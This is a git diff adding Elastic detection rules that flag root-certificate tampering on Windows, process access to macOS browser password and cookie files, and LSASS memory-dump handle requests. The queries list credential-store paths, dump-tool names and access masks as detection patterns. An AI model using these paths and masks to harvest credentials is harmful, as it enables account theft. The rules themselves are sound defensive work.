/dev/null +++ b/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_109.json @@ -0,0 +1,102 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation or modification of a local trusted root certificate in Windows. The install of a malicious root certificate would allow an attacker the ability to masquerade malicious files as valid signed components from any entity (for example, Microsoft). It could also allow an attacker to decrypt SSL traffic.", + "false_positives": [ + "Certain applications may install root certificates for the purpose of inspecting SSL traffic." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Creation or Modification of Root Certificate", + "note": "## Triage and analysis\n\n### Investigating Creation or Modification of Root Certificate\n\nRoot certificates are the primary level of certifications that tell a browser that the communication is trusted and legitimate. This verification is based upon the identification of a certification authority. Windows adds several trusted root certificates so browsers can use them to communicate with websites.\n\n[Check out this post](https://www.thewindowsclub.com/what-are-root-certificates-windows) for more details on root certificates and the involved cryptography.\n\nThis rule identifies the creation or modification of a root certificate by monitoring registry modifications. The installation of a malicious root certificate would allow an attacker the ability to masquerade malicious files as valid signed components from any entity (for example, Microsoft). It could also allow an attacker to decrypt SSL traffic.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed by the subject process such as network connections, other registry or file modifications, and any spawned child processes.\n- If one of the processes is suspicious, retrieve it and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This detection may be triggered by certain applications that install root certificates for the purpose of inspecting SSL traffic. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove the malicious certificate from the root certificate store.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\n registry.path :\n (\n \"HKLM\\\\Software\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\*\\\\Blob\",\n \"HKLM\\\\Software\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\*\\\\Blob\",\n \"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\*\\\\Blob\",\n \"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\*\\\\Blob\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\*\\\\Blob\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\*\\\\Blob\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\*\\\\Blob\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\*\\\\Blob\"\n ) and\n not process.executable : (\n \"?:\\\\ProgramData\\\\Lenovo\\\\Vantage\\\\Addins\\\\LenovoHardwareScanAddin\\\\*\\\\LdeApi.Server.exe\",\n \"?:\\\\ProgramData\\\\Logishrd\\\\LogiOptionsPlus\\\\Plugins\\\\64\\\\certmgr.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"?:\\\\ProgramData\\\\Quest\\\\KACE\\\\modules\\\\clientidentifier\\\\clientidentifier.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Windows\\\\CCM\\\\CcmExec.exe\",\n \"?:\\\\Windows\\\\ccmsetup\\\\cache\\\\ccmsetup.exe\",\n \"?:\\\\Windows\\\\Cluster\\\\clussvc.exe\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe\",\n \"?:\\\\Windows\\\\Lenovo\\\\ImController\\\\PluginHost86\\\\Lenovo.Modern.ImController.PluginHost.Device.exe\",\n \"?:\\\\Windows\\\\Lenovo\\\\ImController\\\\Service\\\\Lenovo.Modern.ImController.exe\",\n \"?:\\\\Windows\\\\Sysmon.exe\",\n \"?:\\\\Windows\\\\Sysmon64.exe\",\n \"?:\\\\Windows\\\\System32\\\\*.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\*.exe\",\n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\WinSxS\\\\*.exe\"\n )\n", + "references": [ + "https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec", + "https://www.ired.team/offensive-security/persistence/t1130-install-root-certificate" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "203ab79b-239b-4aa5-8e54-fc50623ee8e4", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1553", + "name": "Subvert Trust Controls", + "reference": "https://attack.mitre.org/techniques/T1553/", + "subtechnique": [ + { + "id": "T1553.004", + "name": "Install Root Certificate", + "reference": "https://attack.mitre.org/techniques/T1553/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "203ab79b-239b-4aa5-8e54-fc50623ee8e4_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_110.json b/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_110.json new file mode 100644 index 00000000000..4c92a7dbb60 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_110.json @@ -0,0 +1,102 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation or modification of a local trusted root certificate in Windows. The install of a malicious root certificate would allow an attacker the ability to masquerade malicious files as valid signed components from any entity (for example, Microsoft). It could also allow an attacker to decrypt SSL traffic.", + "false_positives": [ + "Certain applications may install root certificates for the purpose of inspecting SSL traffic." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.registry-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Creation or Modification of Root Certificate", + "note": "## Triage and analysis\n\n### Investigating Creation or Modification of Root Certificate\n\nRoot certificates are the primary level of certifications that tell a browser that the communication is trusted and legitimate. This verification is based upon the identification of a certification authority. Windows adds several trusted root certificates so browsers can use them to communicate with websites.\n\n[Check out this post](https://www.thewindowsclub.com/what-are-root-certificates-windows) for more details on root certificates and the involved cryptography.\n\nThis rule identifies the creation or modification of a root certificate by monitoring registry modifications. The installation of a malicious root certificate would allow an attacker the ability to masquerade malicious files as valid signed components from any entity (for example, Microsoft). It could also allow an attacker to decrypt SSL traffic.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed by the subject process such as network connections, other registry or file modifications, and any spawned child processes.\n- If one of the processes is suspicious, retrieve it and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This detection may be triggered by certain applications that install root certificates for the purpose of inspecting SSL traffic. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove the malicious certificate from the root certificate store.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\n registry.path :\n (\n \"HKLM\\\\Software\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\*\\\\Blob\",\n \"HKLM\\\\Software\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\*\\\\Blob\",\n \"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\*\\\\Blob\",\n \"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\*\\\\Blob\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\*\\\\Blob\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\*\\\\Blob\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\*\\\\Blob\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\*\\\\Blob\"\n ) and\n not process.executable : (\n \"?:\\\\ProgramData\\\\Lenovo\\\\Vantage\\\\Addins\\\\LenovoHardwareScanAddin\\\\*\\\\LdeApi.Server.exe\",\n \"?:\\\\ProgramData\\\\Logishrd\\\\LogiOptionsPlus\\\\Plugins\\\\64\\\\certmgr.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"?:\\\\ProgramData\\\\Quest\\\\KACE\\\\modules\\\\clientidentifier\\\\clientidentifier.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Windows\\\\CCM\\\\CcmExec.exe\",\n \"?:\\\\Windows\\\\ccmsetup\\\\cache\\\\ccmsetup.exe\",\n \"?:\\\\Windows\\\\Cluster\\\\clussvc.exe\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe\",\n \"?:\\\\Windows\\\\Lenovo\\\\ImController\\\\PluginHost86\\\\Lenovo.Modern.ImController.PluginHost.Device.exe\",\n \"?:\\\\Windows\\\\Lenovo\\\\ImController\\\\Service\\\\Lenovo.Modern.ImController.exe\",\n \"?:\\\\Windows\\\\Sysmon.exe\",\n \"?:\\\\Windows\\\\Sysmon64.exe\",\n \"?:\\\\Windows\\\\System32\\\\*.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\*.exe\",\n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\WinSxS\\\\*.exe\"\n )\n", + "references": [ + "https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec", + "https://www.ired.team/offensive-security/persistence/t1130-install-root-certificate" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "203ab79b-239b-4aa5-8e54-fc50623ee8e4", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1553", + "name": "Subvert Trust Controls", + "reference": "https://attack.mitre.org/techniques/T1553/", + "subtechnique": [ + { + "id": "T1553.004", + "name": "Install Root Certificate", + "reference": "https://attack.mitre.org/techniques/T1553/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "203ab79b-239b-4aa5-8e54-fc50623ee8e4_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/20457e4f-d1de-4b92-ae69-142e27a4342a_107.json b/packages/security_detection_engine/kibana/security_rule/20457e4f-d1de-4b92-ae69-142e27a4342a_107.json new file mode 100644 index 00000000000..980e5d0d6ce --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/20457e4f-d1de-4b92-ae69-142e27a4342a_107.json @@ -0,0 +1,97 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of a process with arguments pointing to known browser files that store passwords and cookies. Adversaries may acquire credentials from web browsers by reading files specific to the target browser.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Access of Stored Browser Credentials", + "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and\n process.args :\n (\n \"/Users/*/Library/Application Support/Google/Chrome/Default/Login Data\",\n \"/Users/*/Library/Application Support/Google/Chrome/Default/Cookies\",\n \"/Users/*/Library/Application Support/Google/Chrome/Profile*/Cookies\",\n \"/Users/*/Library/Cookies*\",\n \"/Users/*/Library/Application Support/Firefox/Profiles/*.default/cookies.sqlite\",\n \"/Users/*/Library/Application Support/Firefox/Profiles/*.default/key*.db\",\n \"/Users/*/Library/Application Support/Firefox/Profiles/*.default/logins.json\",\n \"Login Data\",\n \"Cookies.binarycookies\",\n \"key4.db\",\n \"key3.db\",\n \"logins.json\",\n \"cookies.sqlite\"\n ) and \n not (process.name : \"wordexp-helper\" and process.parent.name : (\"elastic-agent\", \"elastic-endpoint\"))\n", + "references": [ + "https://securelist.com/calisto-trojan-for-macos/86543/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "20457e4f-d1de-4b92-ae69-142e27a4342a", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1539", + "name": "Steal Web Session Cookie", + "reference": "https://attack.mitre.org/techniques/T1539/" + }, + { + "id": "T1555", + "name": "Credentials from Password Stores", + "reference": "https://attack.mitre.org/techniques/T1555/", + "subtechnique": [ + { + "id": "T1555.003", + "name": "Credentials from Web Browsers", + "reference": "https://attack.mitre.org/techniques/T1555/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "20457e4f-d1de-4b92-ae69-142e27a4342a_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/208dbe77-01ed-4954-8d44-1e5751cb20de_110.json b/packages/security_detection_engine/kibana/security_rule/208dbe77-01ed-4954-8d44-1e5751cb20de_110.json new file mode 100644 index 00000000000..cb68a85a413 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/208dbe77-01ed-4954-8d44-1e5751cb20de_110.json @@ -0,0 +1,109 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies handle requests for the Local Security Authority Subsystem Service (LSASS) object access with specific access masks that many tools with a capability to dump memory to disk use (0x1fffff, 0x1010, 0x120089). This rule is tool agnostic as it has been validated against a host of various LSASS dump tools such as SharpDump, Procdump, Mimikatz, Comsvcs etc. It detects this behavior at a low level and does not depend on a specific tool or dump file name.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "LSASS Memory Dump Handle Access", + "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Handle Access\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nAdversaries may attempt to access credential material stored in LSASS process memory. After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. This is meant to facilitate single sign-on (SSO) ensuring a user isn\u2019t prompted each time resource access is requested. These credential materials can be harvested by an adversary using administrative user or SYSTEM privileges to conduct lateral movement using [alternate authentication material](https://attack.mitre.org/techniques/T1550/).\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There should be very few or no false positives for this rule. If this activity is expected or noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If the process is related to antivirus or endpoint detection and response solutions, validate that it is installed on the correct path and signed with the company's valid digital signature.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Scope compromised credentials and disable the accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "any where event.action == \"File System\" and event.code == \"4656\" and\n\n winlog.event_data.ObjectName : (\n \"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"\\\\Device\\\\HarddiskVolume?\\\\Windows\\\\System32\\\\lsass.exe\",\n \"\\\\Device\\\\HarddiskVolume??\\\\Windows\\\\System32\\\\lsass.exe\") and\n\n /* The right to perform an operation controlled by an extended access right. */\n\n (winlog.event_data.AccessMask : (\"0x1fffff\" , \"0x1010\", \"0x120089\", \"0x1F3FFF\") or\n winlog.event_data.AccessMaskDescription : (\"READ_CONTROL\", \"Read from process memory\"))\n\n /* Common Noisy False Positives */\n\n and not winlog.event_data.ProcessName : (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\system32\\\\wbem\\\\WmiPrvSE.exe\",\n \"?:\\\\Windows\\\\System32\\\\dllhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\*.exe\",\n \"?:\\\\Windows\\\\explorer.exe\",\n \"?:\\\\Windows\\\\System32\\\\poqexec.exe\")\n", + "references": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656", + "https://twitter.com/jsecurity101/status/1227987828534956033?s=20", + "https://attack.mitre.org/techniques/T1003/001/", + "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-170105221010.html", + "http://findingbad.blogspot.com/2017/", + "https://www.elastic.co/security-labs/detect-credential-access" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.AccessMask", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.AccessMaskDescription", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.ObjectName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.ProcessName", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "208dbe77-01ed-4954-8d44-1e5751cb20de", + "setup": "## Setup\n\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nAlso, this event generates only if the object\u2019s [SACL](https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists) has the required access control entry (ACE) to handle the use of specific access rights.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "208dbe77-01ed-4954-8d44-1e5751cb20de_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2138bb70-5a5e-42fd-be5e-b38edf6a6777_2.json 